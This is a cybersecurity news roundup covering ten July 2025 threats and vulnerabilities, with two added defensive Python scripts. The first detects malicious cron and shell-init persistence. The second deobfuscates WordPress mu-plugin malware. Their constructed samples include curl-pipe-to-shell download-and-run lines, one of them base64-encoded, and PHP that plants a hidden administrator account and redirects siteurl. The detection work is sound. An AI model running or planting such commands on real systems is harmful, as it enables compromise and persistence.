
Daily Cybersecurity Roundup, July 24, 2025

As the Dalai Lama’s 90th birthday approaches—a milestone worth candles and cake—threat actors are marking the occasion in darker ways, with China-nexus APTs launching GhostChat and PhantomPrayers campaigns targeting Tibetans. Meanwhile, a new RaaS group dubbed Chaos is wreaking havoc through big-game hunting and double extortion attacks, leveraging spam floods, social engineering, and RMM tools. Adding to the cyber mayhem, researchers discovered four malicious open-source packages packed with spyware and downloaded over 56,000 times, capable of keylogging, screen capture, webcam snooping, and more. Continue reading for more cybersecurity news from the last 24 hours.

01

China-nexus APT launched GhostChat and PhantomPrayers campaigns targeting Tibetans via compromised sites to deploy Ghost RAT and PhantomNet ahead of the Dalai Lama’s 90th birthday.

02

A new RaaS group, Chaos, is conducting big-game hunting and double extortion attacks using spam flooding, social engineering, and RMM tools for persistent access and data exfiltration.

03

A phishing campaign is exploiting Zoom-themed connection issues, using fear-driven emails and deceptive redirects to lure users to a fake Zoom login page for credential theft.

04

The Soco404 cryptomining campaign has been exploiting cloud vulnerabilities to deploy platform-specific malware, using process masquerading and persistence techniques such as cron jobs and shell init files.
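The cron-job and shell-init persistence mentioned above is easy to hunt for on a suspect host. The script below is an added example, not code from the roundup or from the Soco404 research: it scans text as it would come from `crontab -l`, `/etc/cron.d/*`, or files such as `~/.bashrc` and `/etc/profile.d/*.sh` for the command shapes a miner loader typically plants (remote script piped into a shell, base64 blob piped into a shell, binaries staged under `/tmp` or `/dev/shm`, detached `nohup` jobs). The two sample files embedded in it are constructed for the demo.

```python
"""Hunt for drop-and-run persistence in cron entries and shell init files.

Added example; not code from the original roundup or the Soco404 research.
The sample crontab and .bashrc below are constructed for the demo.
"""
import re

# (pattern, reason) pairs. Order matters: only the first hit per line is reported.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b"),
     "download piped straight into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b\s*\|\s*(ba|z|da)?sh\b"),
     "base64-decoded payload piped into a shell"),
    (re.compile(r"(^|[\s;&|=])(/tmp|/dev/shm|/var/tmp)/\S+"),
     "command staged in a world-writable directory"),
    (re.compile(r"\bnohup\b.*&\s*$"),
     "detached background process"),
]


def find_suspicious_entries(text, source):
    """Return one dict per flagged line: source, line number, reason, text.

    Blank lines and comments are skipped so commented-out leftovers do not
    drown real hits; a line gets at most one reason, enough for triage.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(stripped):
                hits.append({"source": source, "line": lineno,
                             "reason": reason, "text": stripped})
                break
    return hits


def scan_files(paths):
    """Run the same check over files on a live host; unreadable paths are skipped."""
    hits = []
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits.extend(find_suspicious_entries(fh.read(), path))
        except OSError:
            continue
    return hits


# --- constructed samples (not captured from a real incident) ---
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://203.0.113.10/x.sh | sh
@reboot nohup /dev/shm/.X11/kworker >/dev/null 2>&1 &
"""

SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH=$HOME/bin:$PATH
alias ll='ls -la'
echo 'Y3VybCBodHRwOi8vMjAzLjAuMTEzLjEwL3guc2ggfCBzaA==' | base64 -d | bash
"""

if __name__ == "__main__":
    for hit in (find_suspicious_entries(SAMPLE_CRONTAB, "crontab")
                + find_suspicious_entries(SAMPLE_BASHRC, "~/.bashrc")):
        print(f"{hit['source']}:{hit['line']}: {hit['reason']}\n    {hit['text']}")
    # On a real host you would instead call, for example:
    # scan_files(["/etc/crontab", "/etc/profile", "/root/.bashrc"])
```

The `certbot` entry and the ordinary `PATH` export pass untouched; the three planted lines are each reported with the reason that matched first. The patterns are deliberately narrow (they describe loader behaviour, not specific miner names), so extend the list with what your own fleet's legitimate automation looks like before relying on a clean result.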

05

Malware has been found in WordPress’s "mu-plugins" directory that uses ROT13 and base64 encoding to hide its code and maintain persistence; IOCs include hidden admin users, malicious files, and modified database options.
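Because mu-plugins load automatically and never appear in the plugin list, the practical first step is to peel the ROT13/base64 wrappers off any unfamiliar file there and read what actually runs. The script below is an added example, not code from the roundup or from the research it summarises: it statically unwraps chains such as `eval(str_rot13(base64_decode('...')))`, then flags strings in the decoded code that line up with the IOCs the item names (user creation for a hidden admin, writes to `wp_options`). The sample plugin it builds is constructed for the demo, and nothing in it executes PHP.

```python
"""Peel ROT13/base64 wrappers off an obfuscated PHP drop-in and triage the result.

Added example; not code from the original roundup or the underlying research.
The mu-plugins sample is constructed for the demo; no PHP is executed.
"""
import base64
import codecs
import re

# One decoding chain: one or more wrappers around a quoted string literal.
# Closing parentheses are consumed separately (one per wrapper) so that a
# surrounding call's own ')' is never swallowed by a greedy regex.
CHAIN_RE = re.compile(
    r"(?P<funcs>(?:\b(?:eval|str_rot13|base64_decode)\s*\(\s*)+)"
    r"['\"](?P<arg>[^'\"]*)['\"]"
)
FUNC_RE = re.compile(r"eval|str_rot13|base64_decode")

# Strings in the decoded code that deserve analyst attention (hypothetical list).
INDICATORS = {
    "wp_create_user": "creates a WordPress user (hidden admin IOC)",
    "set_role": "changes a user's role",
    "update_option": "writes to the wp_options table (modified options IOC)",
    "$_REQUEST": "reads attacker-controlled request data",
}


def _apply(fn, data):
    """Statically emulate one PHP wrapper on a str payload."""
    if fn == "base64_decode":
        return base64.b64decode(data).decode("utf-8", errors="replace")
    if fn == "str_rot13":
        return codecs.decode(data, "rot_13")
    return data  # eval: the decoded string *is* the code that would run


def deobfuscate(src, max_layers=16):
    """Return (decoded_source, layers_removed); gives up after max_layers."""
    layers = 0
    while layers < max_layers:
        m = CHAIN_RE.search(src)
        if not m:
            break
        funcs = FUNC_RE.findall(m.group("funcs"))
        data = m.group("arg")
        for fn in reversed(funcs):        # innermost wrapper runs first
            data = _apply(fn, data)
        end = m.end()
        for _ in funcs:                   # exactly one ')' per wrapper
            while end < len(src) and src[end].isspace():
                end += 1
            if end >= len(src) or src[end] != ")":
                raise ValueError(f"unbalanced wrapper chain at offset {m.start()}")
            end += 1
        if funcs[0] == "eval" and src[end:end + 1] == ";":
            end += 1                      # the ';' of eval(...); belongs to the wrapper
        src = src[:m.start()] + data + src[end:]
        layers += 1
    return src, layers


def flag_indicators(decoded):
    """Reasons for every indicator string present in the decoded code."""
    return [reason for needle, reason in INDICATORS.items() if needle in decoded]


# --- constructed sample: the kind of file found in wp-content/mu-plugins ---
PAYLOAD = (
    "$u = get_user_by('login', 'wp-support');\n"
    "if (!$u) { $id = wp_create_user('wp-support', 'changeme', 'noreply@example.com');"
    " (new WP_User($id))->set_role('administrator'); }\n"
    "update_option('siteurl', 'http://203.0.113.10/');"
)


def build_sample():
    """Wrap PAYLOAD the way the obfuscator would: rot13, base64, then base64 again."""
    inner = base64.b64encode(codecs.encode(PAYLOAD, "rot_13").encode()).decode()
    layer1 = f"eval(str_rot13(base64_decode('{inner}')));"
    outer = base64.b64encode(layer1.encode()).decode()
    return "<?php\n/* Plugin Name: Cache Helper */\neval(base64_decode('" + outer + "'));\n"


if __name__ == "__main__":
    decoded, layers = deobfuscate(build_sample())
    print(f"removed {layers} layer(s):\n{decoded}")
    for reason in flag_indicators(decoded):
        print("  [!]", reason)
```

The decoder applies each wrapper in the order PHP would evaluate it (innermost first) and treats `eval` as "substitute the decoded text for the call", so two layers of wrapping collapse into readable source in two passes. Anything that survives decoding but still contains `eval`, `base64_decode`, or a request superglobal warrants the same scrutiny as the IOCs above; a layer that is not plain ROT13 or base64 (for example `gzinflate`) will simply stop the loop early, which the returned layer count makes visible.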

06

Four malicious packages (three on npm, one on PyPI) have been discovered with over 56,000 downloads, containing surveillance malware capable of keylogging, screen capture, webcam access, fingerprinting, and credential theft.

07

Storm-2603, a suspected China-based threat actor, is exploiting unpatched on-premises SharePoint servers using CVE-2025-49706 and CVE-2025-49704 to deploy Warlock ransomware via web shell payloads.

08

AWS disclosed a critical security vulnerability (CVE-2025-8069) in its Client VPN software for Windows that could allow a local attacker to escalate to administrator-level privileges.

09

Eight vulnerabilities were patched in Helmholz REX 100 industrial routers, including critical flaws enabling full device takeover; the issues span OS command injection, SQL injection, XSS, and denial of service.

10

TP-Link disclosed critical vulnerabilities in its VIGI Network Video Recorder models, tracked as CVE-2025-7723 and CVE-2025-7724, that allow unauthorized access, device manipulation, and lateral movement within the network.
